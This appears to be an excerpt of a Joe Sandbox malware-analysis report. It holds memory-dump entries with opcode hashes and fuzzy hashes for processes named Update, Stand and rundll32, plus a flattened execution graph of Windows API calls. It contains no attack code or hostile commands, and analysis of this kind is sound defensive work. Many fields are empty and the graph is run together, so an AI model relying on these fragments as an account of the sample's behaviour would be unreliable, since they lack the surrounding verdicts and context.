                                                                              • Snapshot File: hcaresult_2_2_7ffd9b8e0000_Update.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: f1e9bed3f380dc16b547c9998ff8f47f665f035d7ff93b8c3d8d4931f6540f99
                                                                              • Instruction ID: 047feeaac4b78b9acf32b344beaf9a604a3c0225113d9c9379a3b67036ba9545
                                                                              • Opcode Fuzzy Hash: f1e9bed3f380dc16b547c9998ff8f47f665f035d7ff93b8c3d8d4931f6540f99
                                                                              • Instruction Fuzzy Hash: 6EF0A731F1550D9FD7A8FB9894955EDBFA0FF48200F4105BBE81DC2161EE341B498780
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.1703218576.00007FFD9B8E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_7ffd9b8e0000_Update.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: d888baf7ae4e6a463734b5769c3e48a296a69406412b819ddc04c3a2db6be4bb
                                                                              • Instruction ID: 2c0c9f97bb8a3896be20a1d51853fc050796098c1dd39f312bd989e84cef9dcd
                                                                              • Opcode Fuzzy Hash: d888baf7ae4e6a463734b5769c3e48a296a69406412b819ddc04c3a2db6be4bb
                                                                              • Instruction Fuzzy Hash: 0CE0203194EA0C5FCF58BBD858511E537E0FF4C304F010159F54DC71A1D6365A91C381
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.1703218576.00007FFD9B8E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_7ffd9b8e0000_Update.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 7708a95c2569e7e72a0d76ba811ada548328357b3eeecc0002d0c0bae778734f
                                                                              • Instruction ID: ca9886532fc8163c56b9357ab81c92bf03ed0c3dbcc65447b991843b56c985fa
                                                                              • Opcode Fuzzy Hash: 7708a95c2569e7e72a0d76ba811ada548328357b3eeecc0002d0c0bae778734f
                                                                              • Instruction Fuzzy Hash: ECE0D8C3B07D4B67E7D48A9804361B11BC6EF9C6507140137915E839B6DE046ED28380
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.1703218576.00007FFD9B8E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_7ffd9b8e0000_Update.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 09764730f88ca0710a5f56b8b043771dc088181434ddbae5fea520ff63f8bc6a
                                                                              • Instruction ID: 7b98cb7ae2748eae44a583b39ee3d704249fdcbc5f8ece6c11fbef22e2e38cfd
                                                                              • Opcode Fuzzy Hash: 09764730f88ca0710a5f56b8b043771dc088181434ddbae5fea520ff63f8bc6a
                                                                              • Instruction Fuzzy Hash: B0E0BF71914A0C9F8B48EF58E8498DA7BF4FB69315B01025BF41DD3160DB719A54CBC5
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.1703218576.00007FFD9B8E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_7ffd9b8e0000_Update.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 82a4a7baa494b2800adebc013fc33f9a30edfb913a5bfdd8d5d5b2f61952b132
                                                                              • Instruction ID: 30b0040d773da672dbebca6111b6c4aae1b39da118fcd27dd0765b94c4add43b
                                                                              • Opcode Fuzzy Hash: 82a4a7baa494b2800adebc013fc33f9a30edfb913a5bfdd8d5d5b2f61952b132
                                                                              • Instruction Fuzzy Hash: 25E0EC20B2A81D4FEAA8A7AC60656B866D0EF5D20074200B5E40DD72B6DD496E8287C5
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.1703218576.00007FFD9B8E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_7ffd9b8e0000_Update.jbxd
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.1807633546.00007FFD9B8D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_7ffd9b8d0000_Stand.jbxd
                                                                              • Opcode Fuzzy Hash: 912ba469188f45203e21450ffe2e33a1394c0427226352e2f8958462926da492
                                                                              • Instruction Fuzzy Hash: 1551FC61B1EA490BE768E7784C676B977D1DF88700F5542BDD44AC32D7DD18680342C2
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.1807633546.00007FFD9B8D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_7ffd9b8d0000_Stand.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 08d386f8031b8cb3f9877ccc980b88fc07499a50dacda43adcb470af10d03c7d
                                                                              • Instruction ID: 2a9fb7957e847ea958b0fd5c60ead2a53964a1a52e679c0bfc1dc0e6be5fadfe
                                                                              • Opcode Fuzzy Hash: 08d386f8031b8cb3f9877ccc980b88fc07499a50dacda43adcb470af10d03c7d
                                                                              • Instruction Fuzzy Hash: 78812B61B0EAC90FE765DB6C98296687FE0EF99310F0506BFE489C71E7CD58A8458342
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.1807633546.00007FFD9B8D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_7ffd9b8d0000_Stand.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: c8a79f5ec6dce09f0980adc0289f8b0f9d730ca83cc368546df8c87f51e5d0c7
                                                                              • Instruction ID: 0aeed4600a1e139a6c26e293c27686a03b5bccbcff4182167932bddc61778819
                                                                              • Opcode Fuzzy Hash: c8a79f5ec6dce09f0980adc0289f8b0f9d730ca83cc368546df8c87f51e5d0c7
                                                                              • Instruction Fuzzy Hash: 6961D761B0EAC94FE755EB7C98696AD7FE0EF99310F0402BFE489C72A7CD1498418342
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.1807633546.00007FFD9B8D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_7ffd9b8d0000_Stand.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 3f3a8303625f0825b3fa2c44ae13e54e521c1100b3a2b712c33fd4a8df641405
                                                                              • Instruction ID: 0d44804b83346066e9e59ad9a639e980914aa30664e9338ef855690907525379
                                                                              • Opcode Fuzzy Hash: 3f3a8303625f0825b3fa2c44ae13e54e521c1100b3a2b712c33fd4a8df641405
                                                                              • Instruction Fuzzy Hash: F912DA3061DA888FD799EB28C465BAA77E1FFDD300F1546AED48EC7262CE349942C741
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.1807633546.00007FFD9B8D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_7ffd9b8d0000_Stand.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: f9720de67db9c4be3b6dd5d9fea3f31ef611a7fb50bdc81571e838e65e07e8f3
                                                                              • Instruction ID: 8ac45f58b5997f0e486c0341b01f7853f17252d00593c6620944ee66655efcd2
                                                                              • Opcode Fuzzy Hash: f9720de67db9c4be3b6dd5d9fea3f31ef611a7fb50bdc81571e838e65e07e8f3
                                                                              • Instruction Fuzzy Hash: 6C81E7A1B0E6894FE7699B6C98395A97FD0EF99310F0903BFE48CC71A3DD146945C342
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.1807633546.00007FFD9B8D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_7ffd9b8d0000_Stand.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: c1d6019dee4f91978cab2ce4d7775b951fae75403c18b96f73ca17febed50f38
                                                                              • Instruction ID: 443ac549a9db1c60e0e2816d312426fc3785edc173238972be68b0df7b47fd3b
                                                                              • Opcode Fuzzy Hash: c1d6019dee4f91978cab2ce4d7775b951fae75403c18b96f73ca17febed50f38
                                                                              • Instruction Fuzzy Hash: 94811570B1DE494FE7A8E7688461AA977D1EFD8300F5146BFD04EC72E6DE24A9028781
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.1807633546.00007FFD9B8D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_7ffd9b8d0000_Stand.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: bce12c17967e2741ce8f68300072053813011698dc9fda9b9fc5664ba1e5010f
                                                                              • Instruction ID: d03d3258143d1ac95fa96cd61333ab14463ce2dce56c6ba737a3c60a70324d5f
                                                                              • Opcode Fuzzy Hash: bce12c17967e2741ce8f68300072053813011698dc9fda9b9fc5664ba1e5010f
                                                                              • Instruction Fuzzy Hash: CF91A470619B488FD399EF28C454A95B7E1FF99301F514ABED09ECB272CA34E942CB41
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.1807633546.00007FFD9B8D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_7ffd9b8d0000_Stand.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 30972e1ebf09109fd4d56d2900c77092787c11ff3fe1e322afce4c4a05fbc4a4
                                                                              • Instruction ID: 464329d10d158fe353ce534663bbd27e32faad9b6adf9485cf1f798726f9b3ee
                                                                              • Opcode Fuzzy Hash: 30972e1ebf09109fd4d56d2900c77092787c11ff3fe1e322afce4c4a05fbc4a4
                                                                              • Instruction Fuzzy Hash: EE612B61B1EA4D0BE768E7BC4C666B9B7D1EF98700F5442BED45AC32D7DD18680382C2
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.1807633546.00007FFD9B8D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_7ffd9b8d0000_Stand.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: d1be949dec41f7d30e9485b204ce3c34d10676a11819dc75d6ed0e02717f0c20
                                                                              • Instruction ID: 6ff0c2847dc5e066f1ccf0e17068fc2c71c5146f6dcadcea5a6128abeeb091e3
                                                                              • Opcode Fuzzy Hash: d1be949dec41f7d30e9485b204ce3c34d10676a11819dc75d6ed0e02717f0c20
                                                                              • Instruction Fuzzy Hash: 4A51F460B1E94D0BE768E7A84C666B9B7D1EF98300F5442BED08EC32D7DD1869428282
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.1807633546.00007FFD9B8D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_7ffd9b8d0000_Stand.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: cf9b6f86606bda53b53dd9230a39778d1e252fa8ef6f6e2af06b577d5ab2e863
                                                                              • Instruction ID: 675b29e9f59f698eda71ad801999e4baac0130946f9cbc384dbb66e150b4062b
                                                                              • Opcode Fuzzy Hash: cf9b6f86606bda53b53dd9230a39778d1e252fa8ef6f6e2af06b577d5ab2e863
                                                                              • Instruction Fuzzy Hash: 0F510C60B0DA884FE755EB6C9819A6D7BD1EF9D310F0406BEF48DC7297CE2498418382
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.1807633546.00007FFD9B8D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_7ffd9b8d0000_Stand.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: ae5d6e96779ea86cb274747d974385724e6f5474f982a80a17552b83e36a9d57
                                                                              • Instruction ID: 13d9ff89bf8add85e35005a8fb33f5f27f008433142c8f7cbd18bd35f7b87a7c
                                                                              • Opcode Fuzzy Hash: ae5d6e96779ea86cb274747d974385724e6f5474f982a80a17552b83e36a9d57
                                                                              • Instruction Fuzzy Hash: 4551C5B1B0E2890FE32A97749C266A53FA0DF87264F1903FFD089C71E3D91925068352
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.1807633546.00007FFD9B8D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_7ffd9b8d0000_Stand.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: a040bae95c512ff1d2326b708315437eb26214106ed3e5ff4069b1ec27b5ad0e
                                                                              • Instruction ID: 9903d3eaa0d8d160c39e7910812c6c4689b3caf1ae9feb578e992e773d59d98a
                                                                              • Opcode Fuzzy Hash: a040bae95c512ff1d2326b708315437eb26214106ed3e5ff4069b1ec27b5ad0e
                                                                              • Instruction Fuzzy Hash: C751F660B1EA890FE768E7BC487A6BD77D2DF98700F5442BDD49AC32D7DC1868024282
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.1807633546.00007FFD9B8D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_7ffd9b8d0000_Stand.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 2f0889f68a41047c172c99e20db8de2c19a899229d101395f3b4fe64ff5f00c5
                                                                              • Instruction ID: 54d171b95008b12d6c49523cd381fcdb08eb8662f933e537d716b90ee47636f3
                                                                              • Opcode Fuzzy Hash: 2f0889f68a41047c172c99e20db8de2c19a899229d101395f3b4fe64ff5f00c5
                                                                              • Instruction Fuzzy Hash: 6641F420B0EAC90FE35A977858656697BD1EFCA750B0503FFE48AC71F3CD5859468342
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.1807633546.00007FFD9B8D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_7ffd9b8d0000_Stand.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 74336f2c412e126b6ef04d14c8d0de8deeebf129662f025fb61ce363548d6c13
                                                                              • Instruction ID: 662989a82b0170c14e125ebda8977cd66f216659d1ef81b8e109f372db597733
                                                                              • Opcode Fuzzy Hash: 74336f2c412e126b6ef04d14c8d0de8deeebf129662f025fb61ce363548d6c13
                                                                              • Instruction Fuzzy Hash: 6B41C77160DA884FD31ADB7CD8A5925BBE1EF8930071442AED09AC72A3CD24FD07C741
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.1807633546.00007FFD9B8D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_7ffd9b8d0000_Stand.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 8d8f92790b4b1b0abd9f707bbdcbb4f7cea5eedfa06837d97d9098574c583c9d
                                                                              • Instruction ID: f425d45d37a253f27b0f369eb7ad2b08bf533b1a2f8cbee1762102578a4bdb51
                                                                              • Opcode Fuzzy Hash: 8d8f92790b4b1b0abd9f707bbdcbb4f7cea5eedfa06837d97d9098574c583c9d
                                                                              • Instruction Fuzzy Hash: 1A319552D9E7C50FF70B637649265A46F64DE27AA570A46FFC0D7CB8A3C50C480B8322
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.1807633546.00007FFD9B8D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_7ffd9b8d0000_Stand.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 58ed4162dc43bffa06f1e79bc2d5c4cd11c4ab738149d2a124cb61865b40f646
                                                                              • Instruction ID: ee95a536e39eb2d1bcd077f82968dbcf5e9a5a76da63ee66d76b3f41614bbce9
                                                                              • Opcode Fuzzy Hash: 58ed4162dc43bffa06f1e79bc2d5c4cd11c4ab738149d2a124cb61865b40f646
                                                                              • Instruction Fuzzy Hash: 3B41D330319B844FD75ADB28C4A1A657BE1EF89700B05429ED09EC72A3CE29ED47C742
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.1807633546.00007FFD9B8D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_7ffd9b8d0000_Stand.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: d0781e675bd63e7a2dfa2a5da757cc4ea4df07ed0b0ce589ae1de0bc7a32c953
                                                                              • Instruction ID: c202e1f07ce63dd70d5dc6519bc271ec0826135dc896f0e739963b2e70d6b925
                                                                              • Opcode Fuzzy Hash: d0781e675bd63e7a2dfa2a5da757cc4ea4df07ed0b0ce589ae1de0bc7a32c953
                                                                              • Instruction Fuzzy Hash: C311A811B1E9990FD75AA3B444656EC7BA0DF89204F550AFEC449C71E3DD1C690B8741
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.1807633546.00007FFD9B8D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_7ffd9b8d0000_Stand.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              Execution Graph

                                                                              Execution Coverage:5.9%
                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                              Signature Coverage:4.8%
                                                                              Total number of Nodes:875
                                                                              Total number of Limit Nodes:17
9506 43c7f48 10 API calls 9505->9506 9507 43fe1b2 9506->9507 9517 43c80a4 9507->9517 9509 43fe1b9 9530 43c7e18 9509->9530 9513 43c7f62 9511->9513 9512 43c8063 9512->9505 9513->9512 9514 43c801d GetWindowLongW SetWindowLongW 9513->9514 9515 43c8045 9513->9515 9514->9515 9534 43bacf4 GetWindowLongW 9515->9534 9519 43c80d0 9517->9519 9518 43c819d 9518->9509 9519->9518 9521 43c80eb 9519->9521 9545 43bf758 9519->9545 9522 43c8153 9521->9522 9523 43c8134 9521->9523 9525 43c8155 9521->9525 9522->9518 9524 43c7e30 129 API calls 9522->9524 9549 43c7494 9523->9549 9524->9522 9574 43bdc28 9525->9574 9531 43c7e1e 9530->9531 9532 43c7d04 129 API calls 9531->9532 9533 43c7e2b 9531->9533 9532->9531 9533->9509 9535 43bad0d 9534->9535 9536 43bad2f IsIconic IsWindowVisible 9535->9536 9537 43badb0 9535->9537 9538 43bad5a ShowWindow 9536->9538 9539 43bad62 9536->9539 9537->9512 9538->9539 9540 43bad77 SetWindowLongW 9539->9540 9541 43bad66 SetWindowLongW 9539->9541 9542 43bad86 9540->9542 9541->9542 9542->9537 9543 43bada8 ShowWindow 9542->9543 9544 43bad9e ShowWindow 9542->9544 9543->9537 9544->9537 9546 43bf793 9545->9546 9547 43bf766 9545->9547 9546->9521 9547->9546 9548 43bf78d ShowWindow 9547->9548 9548->9546 9578 43bac70 9549->9578 9551 43c74a3 9552 43c74fe 9551->9552 9581 43c66f8 9551->9581 9552->9522 9571 43c2f5c 9552->9571 9554 43c74b2 9555 43c74bb SetActiveWindow 9554->9555 9556 43c74c7 9554->9556 9555->9556 9584 43c6954 9556->9584 9558 43c74d4 9559 43c750f 9558->9559 9561 43c74dd 9558->9561 9560 43c8f78 2 API calls 9559->9560 9565 43c751c 9560->9565 9561->9552 9599 43c8f78 IsWindowEnabled 9561->9599 9562 43c758f 9602 43c5b28 9562->9602 9565->9562 9567 43c7539 IsWindowEnabled 9565->9567 9567->9562 9569 43c7543 9567->9569 9568 43bf758 ShowWindow 9568->9552 9570 43c7568 SetWindowPos DefWindowProcW 9569->9570 9570->9552 9572 43bdc28 78 API calls 9571->9572 9573 43c2f68 9572->9573 9573->9522 9575 43bdc4e 9574->9575 9577 43bdc38 9574->9577 9575->9577 9637 43bf798 9575->9637 
9577->9522 9579 43bac8b IsIconic 9578->9579 9580 43bac7e 9578->9580 9579->9551 9580->9551 9610 43c65f8 9581->9610 9585 43c6970 9584->9585 9590 43c6a0e 9584->9590 9586 43c6978 9585->9586 9587 43c6a19 9585->9587 9589 43c698c EnumWindows 9586->9589 9586->9590 9588 43c6a83 9587->9588 9587->9590 9596 43c6a6c ShowWindow 9587->9596 9588->9590 9593 428e084 72 API calls 9588->9593 9591 43c699d 9589->9591 9592 43c69df 9589->9592 9623 43c6848 GetWindow 9589->9623 9590->9558 9591->9592 9597 43c69c8 ShowWindow 9591->9597 9592->9590 9595 428e084 72 API calls 9592->9595 9594 43c6aa6 ShowOwnedPopups 9593->9594 9594->9588 9594->9590 9598 43c6a02 ShowOwnedPopups 9595->9598 9596->9588 9596->9596 9597->9592 9597->9597 9598->9590 9598->9592 9600 43c8f98 EnableWindow 9599->9600 9601 43c74f4 9599->9601 9600->9601 9601->9568 9633 43c5acc SystemParametersInfoW 9602->9633 9605 43c5b41 ShowWindow 9607 43c5b4c 9605->9607 9608 43c5b53 9605->9608 9636 43c5afc SystemParametersInfoW 9607->9636 9608->9552 9611 43c660d 9610->9611 9612 43c6694 9610->9612 9611->9612 9613 43c6616 EnumWindows 9611->9613 9612->9554 9613->9612 9614 43c6636 GetWindow GetWindowLongW 9613->9614 9618 43c6534 9613->9618 9615 43c6653 9614->9615 9615->9612 9616 428e084 72 API calls 9615->9616 9617 43c6688 SetWindowPos 9616->9617 9617->9612 9617->9615 9620 43c654e 9618->9620 9619 43c657e GetWindow 9621 43c658a GetWindowLongW 9619->9621 9622 43c6596 9619->9622 9620->9619 9620->9622 9621->9622 9624 43c687e 9623->9624 9625 43c6865 9623->9625 9627 43c6883 GetCurrentProcessId 9624->9627 9625->9624 9626 43c6872 GetWindowThreadProcessId 9625->9626 9626->9627 9628 43c688d 9627->9628 9629 43c691c 9628->9629 9630 43c68dc IsWindowVisible 9628->9630 9630->9629 9631 43c68e6 9630->9631 9632 41ec0c0 26 API calls 9631->9632 9632->9629 9634 43c5aeb 9633->9634 9634->9605 9635 43c5afc SystemParametersInfoW 9634->9635 9635->9605 9636->9608 9638 43bfb3a 9637->9638 9639 43bf7b0 9637->9639 9638->9577 9639->9638 9640 43bf7c9 9639->9640 9641 43bf7de 
9639->9641 9659 43bef8c 9640->9659 9642 43bf80a 9641->9642 9644 43bf7f5 9641->9644 9645 43bf7d6 9642->9645 9676 43c5d24 9642->9676 9646 43bef8c 75 API calls 9644->9646 9648 43bef8c 75 API calls 9645->9648 9646->9645 9649 43bf825 9648->9649 9683 43c4928 9649->9683 9651 43c4928 GetSystemMetrics 9654 43bf836 9651->9654 9652 43c4914 72 API calls 9652->9654 9653 43c4448 GetMonitorInfoW 9653->9654 9654->9638 9654->9651 9654->9652 9654->9653 9655 43c43b4 GetMonitorInfoW 9654->9655 9656 43c4400 GetMonitorInfoW 9654->9656 9657 43c43e8 GetMonitorInfoW 9654->9657 9658 43c43cc GetMonitorInfoW 9654->9658 9655->9654 9656->9654 9657->9654 9658->9654 9686 431eb9c 9659->9686 9661 43bef9d MonitorFromWindow 9662 43c4928 GetSystemMetrics 9661->9662 9668 43befaf 9662->9668 9663 43befde 9691 43c5cb4 9663->9691 9665 43befe8 9667 43c4928 GetSystemMetrics 9665->9667 9673 43beff2 9667->9673 9668->9663 9669 43befca 9668->9669 9688 43c4914 9668->9688 9671 43c4914 72 API calls 9669->9671 9670 43befd6 9670->9645 9671->9670 9672 43c4914 72 API calls 9672->9673 9673->9670 9673->9672 9674 43bf00d 9673->9674 9675 43c4914 72 API calls 9674->9675 9675->9670 9698 43c5cd4 9676->9698 9679 43c5cb4 73 API calls 9680 43c5d3e 9679->9680 9681 43c5cd4 74 API calls 9680->9681 9682 43c5d44 9681->9682 9682->9645 9684 43c493a 9683->9684 9685 43c4932 GetSystemMetrics 9683->9685 9684->9654 9685->9654 9687 431eba6 9686->9687 9687->9661 9689 428e084 72 API calls 9688->9689 9690 43c4924 9689->9690 9690->9668 9694 43c5c7c 9691->9694 9695 43c5c8c 9694->9695 9697 43c5ca2 EnumDisplayMonitors 9694->9697 9696 428e084 72 API calls 9695->9696 9695->9697 9696->9695 9697->9665 9699 43c4928 GetSystemMetrics 9698->9699 9701 43c5ce7 9699->9701 9700 43c4914 72 API calls 9700->9701 9701->9700 9703 43c5d07 9701->9703 9705 43c5d14 9701->9705 9706 43c4474 GetMonitorInfoW 9701->9706 9704 43c4914 72 API calls 9703->9704 9704->9705 9705->9679 9705->9682 9706->9701

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • GetUserDefaultUILanguage.KERNEL32(00000003,?,00000004,00000000,041ED5DC,?,?), ref: 041ED54E
                                                                              • GetLocaleInfoW.KERNEL32(?,00000003,?,00000004,00000000,041ED5DC,?,?), ref: 041ED557
                                                                                • Part of subcall function 041ED3E4: FindFirstFileW.KERNEL32(00000000,?,00000000,041ED442,?,00000001), ref: 041ED417
                                                                                • Part of subcall function 041ED3E4: FindClose.KERNEL32(00000000,00000000,?,00000000,041ED442,?,00000001), ref: 041ED427
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.3505886596.00000000041E1000.00000020.00000001.01000000.00000010.sdmp, Offset: 041E0000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_41e0000_rundll32.jbxd
                                                                              Similarity
                                                                              • API ID: Find$CloseDefaultFileFirstInfoLanguageLocaleUser
                                                                              • String ID:
                                                                              • API String ID: 3216391948-0
                                                                              • Opcode ID: 36926e79553f09887b65b4172c4fc56fcfdea5e18486bfe0d7c9d42b373cb9e7
                                                                              • Instruction ID: 95eae5be7b9b467f7710e2b0e4e302efc8ea6b036d397e64971843cb95e6f7f0
                                                                              • Opcode Fuzzy Hash: 36926e79553f09887b65b4172c4fc56fcfdea5e18486bfe0d7c9d42b373cb9e7
